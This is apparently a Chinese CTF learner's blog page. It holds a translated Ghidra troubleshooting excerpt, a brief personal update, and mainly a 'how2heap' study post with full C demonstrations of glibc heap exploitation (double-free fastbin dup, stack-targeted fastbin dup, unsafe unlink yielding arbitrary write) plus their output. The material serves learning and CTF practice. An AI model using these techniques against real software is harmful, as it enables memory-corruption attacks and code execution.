使用<GhidraInstallDir><GhidraInstallDir>/support 中提供的脚本启动Ghidra时,您可能会遇到以下错误消息:

  • 问题1:

    找不到Java runtime

    • 解决方案:Java runtime (java/java.exe)需要位于系统 PATH 变量上。请参阅“要求”部分,了解 Ghidra 必须预先安装指定的 Java 版本才能启动。

  • 问题2:

    找不到支持的 JDK 。

    • 解决方案: Ghidra 启动脚本使用系统 PATH 上的 Java runtime 来查找 Ghidra 完成其启动所需的 Java Development Kit(JDK)的受支持版本。请参阅“ 要求”部分,了解 Ghidra 必须预先安装的 JDK 版本才能启动。

  • 问题3:

    退出时出错。在调试模式下运行以获取更多详细信息

    • 解决方案: Ghidra无法在后台启动,并且正在抑制描述失败原因的错误消息。使用 <GhidraInstallDir>/support/ghidraDebug 脚本重新运行 Ghidra 以查看错误消息。

使用Ghidra

有几种方法可以帮助您使用 Ghidra:

  • 可以在<GhidraInstallDir>/docs 中找到教程和文档。
  • 当 Ghidra 运行时,可以在许多主题上获得广泛的上下文相关帮助。要访问主题的帮助,请将鼠标放在窗口,菜单或组件上,然后按键。将显示该窗口/菜单/组件的帮助。
  • 在 Ghidra 运行时,索引帮助可以在Help → Topics…下找到

返回页首

当前版本的已知问题

所有平台

  • 显示指令的正确处理器手册页需要安装 Adobe Reader 8.0.x 或更高版本。Adobe 改变了阅读器版本 7.x 中的goto 页面。如果未安装较新版本的 Reader ,则处理器手册将显示在手册的顶部。使用比 8.0.x 还新的 Adobe Reader 版本适用于大多数平台,但某些平台和版本的阅读器仍然存在问题。
  • 如果 GUI 更新线程长时间运行,则某些操作可能会阻止它们。
  • 项目归档仅存储归档中的私有和签出文件。项目归档不支持基于服务器的存储库。
  • 使用 Ghidra server 时,所有客户端和服务器都必须具有已定义的有效域名服务器(DNS),该服务器已在网络上正确配置,以进行正向和反向查找。
  • 如果已定义叠加,则无法更改图像库。
  • 语言版本控制和迁移不会处理上下文寄存器使用中的复杂更改。
  • Ghidra以一种在较新版本的 Java 中弃用的方式使用 Java 反射。预计 Java 会警告非法反射访问,特别是在导入新文件时。未来版本的 Ghidra 将解决这个问题,以确保与最新版本的 Java 兼容。

Windows

  • 如果旧版本的 7-Zip 包含任何长度为0字节的文件,则可能无法解压缩 Ghidra 分发文件。升级到较新版本的 7-Zip 以解决此问题。

Linux

  • Ghidra Server 不支持基于 PAM 的用户身份验证( -a1 身份验证模式)。
  • 一些用户报告了 4k 显示器和多监视器客户端设置上的 Ghidra GUI 渲染问题。这些问题归因于 Java 中报告的错误。升级到较新版本的 Java 可能会解决此问题。
  • 在撰写本文时,在 Ubuntu 18.04 中安装 openjdk-11 软件包会导致安装 openjdk-10 ,这与 Ghidra 不兼容。

macOS(OS X)

  • 使用网络驱动器(包括网络映射的主目录)在macOS(OS X)上构建新的 Ghidra 模块扩展会引发 Java 异常。 Java / macOS 社区已知此问题,但尚未发布修复程序。有关从 Eclipse 构建 Ghidra 模块扩展的更多信息,请参阅 <GhidraInstallDir> /Extensions/Eclipse/GhidraDev/GhidraDev_README.html 。

返回页首

展开全文 >>

说说最近我干嘛去了

从新年初四开始生病,在医院折腾了半个月才好,出院就开学了,好久没更博客了,最近又进了LCTT(Linux.Cn Translation Team),又忙各种那边的事,现在也算是正式成员了,在LCTT的个人主页:https://linux.cn/lctt/zero-MK

各位大佬帮忙看看翻得如何,还请不吝赐教

后面我暂时先把那边的工作放一放,回归正业–CTF

说实话,在这个上我真是个菜鸡,原先刚进战队的时候被分配到pwn,然后又被分配到Misc,反正就是挺。。。

以后尽量更吧,估计也没人看,当是写笔记

展开全文 >>

how2heap学习

File Technique Glibc-Version Applicable CTF Challenges
first_fit.c Demonstrating glibc malloc’s first-fit behavior.
fastbin_dup.c Tricking malloc into returning an already-allocated heap pointer by abusing the fastbin freelist.
fastbin_dup_into_stack.c Tricking malloc into returning a nearly-arbitrary pointer by abusing the fastbin freelist. latest 9447-search-engine, 0ctf 2017-babyheap
fastbin_dup_consolidate.c Tricking malloc into returning an already-allocated heap pointer by putting a pointer on both fastbin freelist and unsorted bin freelist. latest Hitcon 2016 SleepyHolder
unsafe_unlink.c Exploiting free on a corrupted chunk to get arbitrary write. < 2.26 HITCON CTF 2014-stkof, Insomni’hack 2017-Wheel of Robots
house_of_spirit.c Frees a fake fastbin chunk to get malloc to return a nearly-arbitrary pointer. latest hack.lu CTF 2014-OREO
poison_null_byte.c Exploiting a single null byte overflow. < 2.26 PlaidCTF 2015-plaiddb
house_of_lore.c Tricking malloc into returning a nearly-arbitrary pointer by abusing the smallbin freelist. < 2.26
overlapping_chunks.c Exploit the overwrite of a freed chunk size in the unsorted bin in order to make a new allocation overlap with an existing chunk < 2.26 hack.lu CTF 2015-bookstore, Nuit du Hack 2016-night-deamonic-heap
overlapping_chunks_2.c Exploit the overwrite of an in use chunk size in order to make a new allocation overlap with an existing chunk latest
house_of_force.c Exploiting the Top Chunk (Wilderness) header in order to get malloc to return a nearly-arbitrary pointer latest Boston Key Party 2016-cookbook, BCTF 2016-bcloud
unsorted_bin_into_stack.c Exploiting the overwrite of a freed chunk on unsorted bin freelist to return a nearly-arbitrary pointer. < 2.26
unsorted_bin_attack.c Exploiting the overwrite of a freed chunk on unsorted bin freelist to write a large value into arbitrary address < 2.26 0ctf 2016-zerostorage
large_bin_attack.c Exploiting the overwrite of a freed chunk on large bin freelist to write a large value into arbitrary address < 2.26 0ctf 2018-heapstorm2
house_of_einherjar.c Exploiting a single null byte overflow to trick malloc into returning a controlled pointer < 2.26 Seccon 2016-tinypad
house_of_orange.c Exploiting the Top Chunk (Wilderness) in order to gain arbitrary code execution < 2.26 Hitcon 2016 houseoforange
tcache_dup.c Tricking malloc into returning an already-allocated heap pointer by abusing the tcache freelist. > 2.25
tcache_poisoning.c Tricking malloc into returning a completely arbitrary pointer by abusing the tcache freelist. > 2.25
tcache_house_of_spirit.c Frees a fake chunk to get malloc to return a nearly-arbitrary pointer. > 2.25

first_fit.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main()
{
	fprintf(stderr, "这个源文件不演示攻击,只是演示正常的glibc's allocator.\n");
	fprintf(stderr, "glibc使用first-fit算法来选择一个空闲块(free chunk)。\n");
	fprintf(stderr, "如果一个空闲块(free chunk)且足够大,malloc将选择这个块。\n");
	fprintf(stderr, "This can be exploited in a use-after-free situation.\n");

	fprintf(stderr, "分配2个buffers.它们可以很大,不必是fastbin。\n");
	char* a = malloc(512);
	char* b = malloc(256);
	char* c;

	fprintf(stderr, "1st malloc(512): %p\n", a);
	fprintf(stderr, "2nd malloc(256): %p\n", b);
	fprintf(stderr, "我们可以在这里继续mallocing ...\n");
	fprintf(stderr, "现在让我们把一个字符串放在我们稍后可读的buffer上\"this is A!\"\n");
	strcpy(a, "this is A!");
	fprintf(stderr, "第一次分配的 %p 指向 %s\n", a, a);

	fprintf(stderr, "free掉 a buffer...\n");
	free(a);

	fprintf(stderr, "我们不需要再free任何东西。现在只要我们malloc少于512,最终将会指向 %p\n", a);

	fprintf(stderr, "现在让我们分配 500 bytes\n");
	c = malloc(500);
	fprintf(stderr, "3rd malloc(500): %p\n", c);
	fprintf(stderr, "并在这里放一个不同的字符串, \"this is C!\"\n");
	strcpy(c, "this is C!");
	fprintf(stderr, "第三次分配的 %p 指向 %s\n", c, c);
	fprintf(stderr, "第一次分配的 %p 指向 %s\n", a, a);
	fprintf(stderr, "如果我们重用第一个分配,那么它现在保存来自第三个分配的数据。\n");
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
output:
这个源文件不演示攻击,只是演示正常的glibc's allocator.
glibc使用first-fit算法来选择一个空闲块(free chunk)。
如果一个空闲块(free chunk)且足够大,malloc将选择这个块。
This can be exploited in a use-after-free situation.
分配2个buffers.它们可以很大,不必是fastbin。
1st malloc(512): 0xfc1010
2nd malloc(256): 0xfc1220
我们可以在这里继续mallocing ...
现在让我们把一个字符串放在我们稍后可读的buffer上"this is A!"
第一次分配的 0xfc1010 指向 this is A!
free掉 a buffer...
我们不需要再free任何东西。现在只要我们malloc少于512,最终将会指向 0xfc1010
现在让我们分配 500 bytes
3rd malloc(500): 0xfc1010
并在这里放一个不同的字符串, "this is C!"
第三次分配的 0xfc1010 指向 this is C!
第一次分配的 0xfc1010 指向 this is C!
如果我们重用第一个分配,那么它现在保存来自第三个分配的数据。

—————————————————————————————————————————————————

fastbin_dup.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include <stdio.h>
#include <stdlib.h>

int main()
{
	fprintf(stderr, "此文件演示使用fastbins的简单 double-free 攻击\n");

	fprintf(stderr, "分配3个buffers.\n");
	int *a = malloc(8);
	int *b = malloc(8);
	int *c = malloc(8);

	fprintf(stderr, "1st malloc(8): %p\n", a);
	fprintf(stderr, "2nd malloc(8): %p\n", b);
	fprintf(stderr, "3rd malloc(8): %p\n", c);

	fprintf(stderr, "free掉第一个buffer--(a)\n");
	free(a);

	fprintf(stderr, "如果我们现在再次free %p,程序就会崩溃因为 %p 在free list的顶部\n", a, a);
	// free(a);

	fprintf(stderr, "所以我们free掉 %p\n", b);
	free(b);

	fprintf(stderr, "现在我们可以再次free %p, 因为它不是free list的头\n", a);
	free(a);

	fprintf(stderr, "现在我们得到的free list是 [ %p, %p, %p ]. 如果我们现在malloc三次,我们能malloc到 %p 两次!\n", a, b, a, a);
	fprintf(stderr, "1st malloc(8): %p\n", malloc(8));
	fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
	fprintf(stderr, "3rd malloc(8): %p\n", malloc(8));
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
output:
此文件演示使用fastbins的简单 double-free 攻击
分配3个buffers.
1st malloc(8): 0x1a4a010
2nd malloc(8): 0x1a4a030
3rd malloc(8): 0x1a4a050
free掉第一个buffer--(a)
如果我们现在再次free 0x1a4a010,程序就会崩溃因为 0x1a4a010 在free list的顶部
所以我们free掉 0x1a4a030
现在我们可以再次free 0x1a4a010, 因为它不是free list的头。
现在我们得到的free list是 [ 0x1a4a010, 0x1a4a030, 0x1a4a010  ] 如果我们现在malloc三次,我们能malloc到 0x1a4a010 两次!
1st malloc(8): 0x1a4a010
2nd malloc(8): 0x1a4a030
3rd malloc(8): 0x1a4a010

—————————————————————————————————————————————————

fastbin_dup_into_stack.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#include <stdio.h>
#include <stdlib.h>

int main()
{
	fprintf(stderr, "这个文件是fastbin_dup.c的扩展,通过欺骗malloc\n"
	       "返回一个指向受控位置的指针(在本例中为堆栈)。\n");

	unsigned long long stack_var;

	fprintf(stderr, "我们让malloc()返回 %p.\n", 8+(char *)&stack_var);

	fprintf(stderr, "分配3个buffer\n");
	int *a = malloc(8);
	int *b = malloc(8);
	int *c = malloc(8);

	fprintf(stderr, "1st malloc(8): %p\n", a);
	fprintf(stderr, "2nd malloc(8): %p\n", b);
	fprintf(stderr, "3rd malloc(8): %p\n", c);

	fprintf(stderr, "free掉第一个buffer--(a)\n");
	free(a);

	fprintf(stderr, "如果我们现在再次free %p,程序就会崩溃因为 %p 在free list的顶部\n", a, a);
	// free(a);

	fprintf(stderr, "所以我们free掉 %p\n", b);
	free(b);

	fprintf(stderr, "现在我们可以再次free %p, 因为它不是free list的头\n", a);
	free(a);

	fprintf(stderr, "现在我们得到free list [ %p, %p, %p ] "
		"我们现在通过修改 %p 的数据来执行攻击\n", a, b, a, a);
	unsigned long long *d = malloc(8);

	fprintf(stderr, "1st malloc(8): %p\n", d);
	fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
	fprintf(stderr, "现在得free list [ %p ].\n", a);
	fprintf(stderr, "现在,我们可以访问 %p,同时它仍然是free list的头部。\n"
		"所以现在我们正在写入一个假的free size (在这里是 0x20) 到栈上\n"
		"所以malloc会认为那里有一个free chunk\n"
		"并return一个指向 %p 的指针\n", a, 8+(char *)&stack_var);
	stack_var = 0x20;

	fprintf(stderr, "现在,我们将 %p 处的数据的前8个字节覆盖在0x20之前\n", a);
	*d = (unsigned long long) (((char*)&stack_var) - sizeof(d));

	fprintf(stderr, "3rd malloc(8): %p, 将栈地址放到free list中\n", malloc(8));
	fprintf(stderr, "4th malloc(8): %p\n", malloc(8));
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
output:
这个文件是fastbin_dup.c的扩展,通过欺骗malloc
返回一个指向受控位置的指针(在本例中为堆栈)
我们让malloc()返回 0x7ffd09e37068
分配3个buffer
1st malloc(8): 0x1801010
2nd malloc(8): 0x1801030
3rd malloc(8): 0x1801050
free掉第一个buffer--(a)
如果我们现在再次free 0x1801010,程序就会崩溃因为 0x1801010 在free list的顶部
所以我们free掉 0x1801030
现在我们可以再次free 0x1801010, 因为它不是free list的头
现在我们得到free list [ 0x1801010, 0x1801030, 0x1801010  ] 我们现在通过修改 0x1801010 的数据来执行攻击
1st malloc(8): 0x1801010
2nd malloc(8): 0x1801030
现在得free list [ 0x1801010  ].
现在,我们可以访问 0x1801010,同时它仍然是free list的头部。
所以现在我们正在写入一个假的free size (在这里是 0x20) 到栈上
所以malloc会认为那里有一个free chunk
并return一个指向 0x7ffd09e37068 的指针
现在,我们将 0x1801010 处的数据的前8个字节覆盖在0x20之前
3rd malloc(8): 0x1801010, 将栈地址放到free list中
4th malloc(8): 0x7ffd09e37068

fastbin_dup_consolidate.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

int main() {
  void* p1 = malloc(0x40);
  void* p2 = malloc(0x40);
  fprintf(stderr, "分配两个fastbins: p1=%p p2=%p\n", p1, p2);
  fprintf(stderr, "free掉 p1!\n");
  free(p1);

  void* p3 = malloc(0x400);
  fprintf(stderr, "分配large bin来触发malloc_consolidate(): p3=%p\n", p3);
  fprintf(stderr, "在 malloc_consolidate() 中, p1 被放到 unsorted bin.\n");
  free(p1);
  fprintf(stderr, "触发double free漏洞\n");
  fprintf(stderr, "我们能pass malloc()的检查,因为p1不是fast top\n");
  fprintf(stderr, "现在 p1 在 unsorted bin 和 fast bin中. 所以我们能分配到 p1 两次: %p %p\n", malloc(0x40), malloc(0x40));
}
1
2
3
4
5
6
7
8
output:
分配两个fastbins: p1=0x250a010 p2=0x250a060
free掉 p1!
分配large bin来触发malloc_consolidate(): p3=0x250a0b0
在 malloc_consolidate() 中, p1 被放到 unsorted bin.
触发double free漏洞
我们能pass malloc()的检查,因为p1不是fast top
现在p1在 unsorted bin 和 fast bin中. 所以我们能分配到p1两次: 0x250a010 0x250a010
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>


uint64_t *chunk0_ptr;

int main()
{
	fprintf(stderr, "欢迎来到 unsafe unlink 2.0!\n");
	fprintf(stderr, "实验进行的环境:Ubuntu 14.04/16.04 64bit.\n");
	fprintf(stderr, "此技术仅适用于glibc的禁用tcache-option的情况, 请参阅build_glibc.sh以获取构建说明。\n");
	fprintf(stderr, "该技术用于当你拥有一个已知位置的指针指向一个可以调用 unlink 的区域时\n");
	fprintf(stderr, "最常见的情况是易受攻击的缓冲区,可以溢出并控制全局指针。\n");

	int malloc_size = 0x80; //足够大,不使用fastbins
	int header_size = 2;

	fprintf(stderr, "这个练习是使用free来破坏全局指针chunk0_ptr来实现任意内存写入。\n\n");

	chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0
	uint64_t *chunk1_ptr  = (uint64_t*) malloc(malloc_size); //chunk1
	fprintf(stderr, "chunk0_ptr 位于 %p, 指向 %p\n", &chunk0_ptr, chunk0_ptr);
	fprintf(stderr, "我们要破坏的chunk是 %p\n\n", chunk1_ptr);

	fprintf(stderr, "我现在创建一个假chuck在chunk0里.\n");
	fprintf(stderr, "我们设置假chuck的'next_free_chunk' (fd) 指向 &chunk0_ptr 附近 以便满足 P->fd->bk = P.\n");
	chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);
	fprintf(stderr, "我们设置假chuck的 'previous_free_chunk' (bk) 指向 &chunk0_ptr  附近 以便满足 P->bk->fd = P.\n");
	fprintf(stderr, "这样设置,我们就可以绕过这个检查:(P->fd->bk != P || P->bk->fd != P) == False\n");
	chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);
	fprintf(stderr, "Fake chunk fd: %p\n",(void*) chunk0_ptr[2]);
	fprintf(stderr, "Fake chunk bk: %p\n\n",(void*) chunk0_ptr[3]);

	//fprintf(stderr, "我们需要确保假 chunk 的 'size' 与下一块的 'previous_size' (chunk+size)匹配\n");
	//fprintf(stderr, "通过此设置,我们可以通过此检查: (chunksize(P) != prev_size (next_chunk(P)) == False\n");
	//fprintf(stderr, "P = chunk0_ptr, next_chunk(P) == (mchunkptr) (((char *) (p)) + chunksize (p)) == chunk0_ptr + (chunk0_ptr[1]&(~ 0x7))\n");
	//fprintf(stderr, "If x = chunk0_ptr[1] & (~ 0x7), that is x = *(chunk0_ptr + x).\n");
	//fprintf(stderr, "We just need to set the *(chunk0_ptr + x) = x, so we can pass the check\n");
	//fprintf(stderr, "1.Now the x = chunk0_ptr[1]&(~0x7) = 0, we should set the *(chunk0_ptr + 0) = 0, in other words we should do nothing\n");
	//fprintf(stderr, "2.Further more we set chunk0_ptr = 0x8 in 64-bits environment, then *(chunk0_ptr + 0x8) == chunk0_ptr[1], it's fine to pass\n");
	//fprintf(stderr, "3.Finally we can also set chunk0_ptr[1] = x in 64-bits env, and set *(chunk0_ptr+x)=x,for example chunk_ptr0[1] = 0x20, chunk_ptr0[4] = 0x20\n");
	//chunk0_ptr[1] = sizeof(size_t);
	//fprintf(stderr, "In this case we set the 'size' of our fake chunk so that chunk0_ptr + size (%p) == chunk0_ptr->size (%p)\n", ((char *)chunk0_ptr + chunk0_ptr[1]), &chunk0_ptr[1]);
	//fprintf(stderr, "You can find the commitdiff of this check at https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=17f487b7afa7cd6c316040f3e6c86dc96b2eec30\n\n");

	fprintf(stderr, "我们假设 chunk0 中有溢出,以便我们可以自由地更改 chunk1 的元数据。\n");
	uint64_t *chunk1_hdr = chunk1_ptr - header_size;
	fprintf(stderr, "我们缩小了 chunk0 的大小 (在 chunk1 中保存为 'previous_size') 这样 free 就会认为 chunk0 从我们放置假 chunk 的地方开始。\n");
	fprintf(stderr, "重要的是,我们的假 chunk 正好从已知指针指向的地方开始,并且我们相应地收缩 chunk 。\n");
	chunk1_hdr[0] = malloc_size;
	fprintf(stderr, "如果我们正常释放 chunk0,chunk1.previous_size 将为0x90,但它现在为: %p\n",(void*)chunk1_hdr[0]);
	fprintf(stderr, "我们将 chunk1 的 'previous_in_use' 设置为 False,将我们的假 chunk 标记为free。\n\n");
	chunk1_hdr[1] &= ~1;

	fprintf(stderr, "现在我们 free 掉 chunk1 以便向后整合 unlink 我们的假 chunk,覆盖chunk0_ptr。\n");
	fprintf(stderr, "您可以在 https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344 中找到 unlink 宏的来源\n\n");
	free(chunk1_ptr);

	fprintf(stderr, "此时,我们可以使用 chunk0_ptr 覆盖自身,以指向任意位置。\n");
	char victim_string[8];
	strcpy(victim_string,"Hello!~");
	chunk0_ptr[3] = (uint64_t) victim_string;

	fprintf(stderr, "chunk0_ptr 现在指向我们想要的位置,我们用它来覆盖我们的字符串。\n");
	fprintf(stderr, "原本的值为: %s\n",victim_string);
	chunk0_ptr[0] = 0x4141414142424242LL;
	fprintf(stderr, "被修改后: %s\n",victim_string);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
output:
欢迎来到 unsafe unlink 2.0!
实验进行的环境:Ubuntu 14.04/16.04 64bit.
此技术仅适用于glibc的禁用tcache-option的情况, 请参阅build_glibc.sh以获取构建说明。
该技术用于当你拥有一个已知位置的指针指向一个可以调用 unlink 的区域时
最常见的情况是易受攻击的缓冲区,可以溢出并控制全局指针。
这个练习是使用free来破坏全局指针chunk0_ptr来实现任意内存写入。

chunk0_ptr 位于 0x602070, 指向 0xacb010
我们要破坏的chunk是 0xacb0a0

我现在创建一个假chuck在chunk0里.
我们设置假chuck的'next_free_chunk' (fd) 指向 &chunk0_ptr 附近 以便满足 P->fd->bk = P.
我们设置假chuck的 'previous_free_chunk' (bk) 指向 &chunk0_ptr  附近 以便满足 P->bk->fd = P.
这样设置,我们就可以绕过这个检查:(P->fd->bk != P || P->bk->fd != P) == False
Fake chunk fd: 0x602058
Fake chunk bk: 0x602060

我们假设 chunk0 中有溢出,以便我们可以自由地更改 chunk1 的元数据。
我们缩小了 chunk0 的大小 (在 chunk1 中保存为 'previous_size') 这样 free 就会认为 chunk0 从我们放置假 chunk 的地方开始。
重要的是,我们的假 chunk 正好从已知指针指向的地方开始,并且我们相应地收缩 chunk 。
如果我们正常释放 chunk0,chunk1.previous_size 将为0x90,但它现在为: 0x80
我们将 chunk1 的 'previous_in_use' 设置为 False,将我们的假 chunk 标记为free。

现在我们 free 掉 chunk1 以便向后整合 unlink 我们的假 chunk,覆盖chunk0_ptr。
您可以在 https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344 中找到 unlink 宏的来源

此时,我们可以使用 chunk0_ptr 覆盖自身,以指向任意位置。
chunk0_ptr 现在指向我们想要的位置,我们用它来覆盖我们的字符串。
原本的值为: Hello!~
被修改后: BBBBAAAA���

展开全文 >>

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

没技术,没钱,没长相,只有一颗疲惫不堪的心